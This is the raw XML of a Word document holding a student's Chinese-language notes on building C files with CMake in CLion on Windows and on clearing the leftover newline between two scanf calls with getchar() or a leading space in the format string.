    <w:p w14:paraId="44F31FC6" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="00D876D5"/>
    <w:p w14:paraId="0C013528" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="00D876D5"/>
    <w:p w14:paraId="5A85101B" w14:textId="148CAA61" w:rsidR="00204CC9" w:rsidRDefault="00204CC9" w:rsidP="00204CC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMP9024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Clion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上进行编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB9C95" w14:textId="77777777" w:rsidR="00204CC9" w:rsidRDefault="00204CC9" w:rsidP="00204CC9"/>
    <w:p w14:paraId="5452208B" w14:textId="5EB62A4C" w:rsidR="00204CC9" w:rsidRDefault="00C6384F" w:rsidP="00204CC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，因此编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目我自己没有使用默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>makefile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而是自己用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMakeList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF19A35" w14:textId="77777777" w:rsidR="00C6384F" w:rsidRDefault="00C6384F" w:rsidP="00204CC9"/>
    <w:p w14:paraId="2E66C3A8" w14:textId="77777777" w:rsidR="00C6384F" w:rsidRDefault="00C6384F" w:rsidP="00C6384F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于单个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5573B8" w14:textId="1BBFF6AB" w:rsidR="00C6384F" w:rsidRDefault="00C6384F" w:rsidP="00204CC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>手动创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CMakeList.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>插件功能，右键</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件添加单个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CmakeList.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>右键</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CmakeList.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Reload from disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，最终直接点击调试器或者运行器运行即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEB8CD9" w14:textId="77777777" w:rsidR="00C6384F" w:rsidRDefault="00C6384F" w:rsidP="00204CC9"/>
    <w:p w14:paraId="4356A688" w14:textId="77777777" w:rsidR="00C6384F" w:rsidRDefault="00C6384F" w:rsidP="00C6384F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.c .h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5555D07E" w14:textId="03C8A460" w:rsidR="00C6384F" w:rsidRPr="00C6384F" w:rsidRDefault="00C6384F" w:rsidP="00204CC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CmakeList.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以手动写成如下，再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reload CmakeList.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也可以运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D87B41" w14:textId="77777777" w:rsidR="00204CC9" w:rsidRDefault="00204CC9" w:rsidP="00D876D5"/>
    <w:p w14:paraId="00F510F1" w14:textId="77777777" w:rsidR="00C6384F" w:rsidRPr="00C6384F" w:rsidRDefault="00C6384F" w:rsidP="00C6384F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>file(GLOB SOURCES "*.c")</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6384F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>add_executable(main ${SOURCES})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB6ADE" w14:textId="77777777" w:rsidR="00204CC9" w:rsidRPr="00C6384F" w:rsidRDefault="00204CC9" w:rsidP="00D876D5"/>
    <w:p w14:paraId="3BE84DAC" w14:textId="77777777" w:rsidR="00204CC9" w:rsidRDefault="00204CC9" w:rsidP="00D876D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF02FC9" w14:textId="02A2D72B" w:rsidR="00D876D5" w:rsidRDefault="00FF67CF" w:rsidP="00FF67CF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何吃掉换行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0418C02C" w14:textId="77777777" w:rsidR="00FF67CF" w:rsidRDefault="00FF67CF" w:rsidP="00FF67CF"/>
    <w:p w14:paraId="0C3AB67D" w14:textId="5DBCEBA8" w:rsidR="00FF67CF" w:rsidRPr="006337DB" w:rsidRDefault="00DD21E7" w:rsidP="00FF67CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相挨，若</w:t>
      </w:r>
      <w:r w:rsidR="00FF67CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个</w:t>
      </w:r>
      <w:r w:rsidR="00FF67CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r w:rsidR="006337DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受单个</w:t>
      </w:r>
      <w:r w:rsidR="006337DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidR="006337DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，</w:t>
      </w:r>
      <w:r w:rsidR="00FF67CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidR="006337DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误赋值</w:t>
      </w:r>
      <w:r w:rsidR="006337DB">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="006337DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidR="006337DB">
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30A181" w14:textId="01CE00CA" w:rsidR="00FF67CF" w:rsidRDefault="00FF67CF" w:rsidP="00FF67CF">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>canf(</w:t>
      </w:r>
      <w:r w:rsidR="00DD21E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00DD21E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阿猫阿狗接受什么都行</w:t>
      </w:r>
      <w:r w:rsidR="00DD21E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B09B77" w14:textId="2B674CE7" w:rsidR="00FF67CF" w:rsidRPr="00FF67CF" w:rsidRDefault="00FF67CF" w:rsidP="00FF67CF">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>canf(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%c</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, &amp;char2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23A5F0" w14:textId="77777777" w:rsidR="00D876D5" w:rsidRPr="00FF67CF" w:rsidRDefault="00D876D5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489D2CB4" w14:textId="0D654FD4" w:rsidR="00D876D5" w:rsidRPr="00FF67CF" w:rsidRDefault="00FF67CF" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过调试，比如我输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a\nb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的回车</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会发现第二个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%c</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, &amp;char2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受的是字符</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而非</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此判定，按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会影响第二个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的输入</w:t>
      </w:r>
      <w:r w:rsidR="00DD21E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会使得第二个</w:t>
      </w:r>
      <w:r w:rsidR="00DD21E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r w:rsidR="00DD21E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是回车字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45385FC8" w14:textId="77777777" w:rsidR="00D876D5" w:rsidRDefault="00D876D5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093699D4" w14:textId="229FD863" w:rsidR="0024326F" w:rsidRDefault="0024326F" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getchar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fgets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等是接受标准输入（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stdin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的函数，如果后面也有接受标准输入的函数，记得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getchar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去吃掉那个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57316436" w14:textId="63FE7CC5" w:rsidR="00DD21E7" w:rsidRPr="00DD21E7" w:rsidRDefault="00DD21E7" w:rsidP="00DD21E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理方法一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795EAE35" w14:textId="06B2CC06" w:rsidR="007903BE" w:rsidRPr="007903BE" w:rsidRDefault="007903BE" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getchar()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吃这个</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是不需要给其他变量赋值，因为这个</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身没用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D89B5DF" w14:textId="77777777" w:rsidR="007903BE" w:rsidRDefault="007903BE" w:rsidP="007903BE">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>canf(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%c</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, &amp;char1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C383D71" w14:textId="67795154" w:rsidR="007903BE" w:rsidRDefault="007903BE" w:rsidP="007903BE">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etchar();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27132E8A" w14:textId="5C379ABD" w:rsidR="007903BE" w:rsidRDefault="007903BE" w:rsidP="007903BE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>canf(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%c</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, &amp;char2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74E0B5" w14:textId="77777777" w:rsidR="00C66F68" w:rsidRDefault="00C66F68" w:rsidP="007903BE"/>
    <w:p w14:paraId="161C716A" w14:textId="2FAE5704" w:rsidR="007903BE" w:rsidRPr="00FF67CF" w:rsidRDefault="00DD21E7" w:rsidP="00DD21E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理方法二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE8FC29" w14:textId="29F9CA40" w:rsidR="00D876D5" w:rsidRDefault="007903BE" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个方法，是第二个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %c</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, &amp;char2),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %c</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面有个空格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA7B10" w14:textId="7F538FEB" w:rsidR="007903BE" w:rsidRDefault="007903BE" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>据我推测，这个方法利用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受数据并非严格格式化字符串输入的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E3CF3C" w14:textId="407C9DF2" w:rsidR="007903BE" w:rsidRDefault="007903BE" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanf(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%d %d</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp;a, &amp;b), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1+2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，都可以正常通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a,b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个变量赋值，不一定要严格</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1 2</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以空格分隔。</w:t>
      </w:r>
    </w:p>
